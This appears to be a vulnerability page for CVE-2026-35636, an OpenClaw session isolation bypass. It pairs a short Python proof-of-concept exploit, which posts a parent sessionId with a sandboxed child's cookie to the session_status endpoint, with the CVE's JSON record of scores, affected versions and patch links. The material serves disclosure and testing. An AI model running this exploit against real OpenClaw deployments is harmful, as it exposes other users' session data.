CVE-2026-35636

#!/usr/bin/env python3 """ PoC for CVE-2026-35636 (OpenClaw Session Isolation Bypass) This script demonstrates how a sandboxed child session might access parent session data due to the resolution order vulnerability. """ import requests import json def exploit_poc(target_host, child_session_cookie, target_parent_id): """ Attempts to resolve a parent session ID from a sandboxed child context. """ url = f"{target_host}/api/session_status" # Headers simulating the sandboxed child session headers = { "Cookie": f"sessionId={child_session_cookie}", "Content-Type": "application/json" } # Payload containing the ID of the restricted parent session payload = { "sessionId": target_parent_id } print(f"[*] Attempting to resolve parent session ID: {target_parent_id}") print(f"[*] Using child session cookie: {child_session_cookie}") try: response = requests.post(url, headers=headers, json=payload, timeout=10) if response.status_code == 200: data = response.json() print("[+] Potential Bypass Successful! Response received:") print(json.dumps(data, indent=2)) return True else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response body: {response.text}") return False except Exception as e: print(f"[!] Error during request: {e}") return False if __name__ == "__main__": # Example usage - replace with actual target details during testing TARGET = "http://localhost:8080" CHILD_SESSION = "sandbox_child_token_123" PARENT_ID = "restricted_parent_session_456" exploit_poc(TARGET, CHILD_SESSION, PARENT_ID)

{"cve": {"id": "CVE-2026-35636", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:32.750", "lastModified": "2026-04-16T20:48:34.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions 2026.3.11 through 2026.3.24 contain a session isolation bypass vulnerability where session_status resolves sessionId to canonical session keys before enforcing visibility checks. Sandboxed child sessions can exploit this to access parent or sibling sessions that should be blocked by explicit sessionKey restrictions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-696"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "2026.3.11", "versionEndExcluding": "2026.3.25", "matchCriteriaId": "7734D87C-5FD8-433A-98A4-6A174F7A3A96"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-session-isolation-bypass-via-sessionid-resolution", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}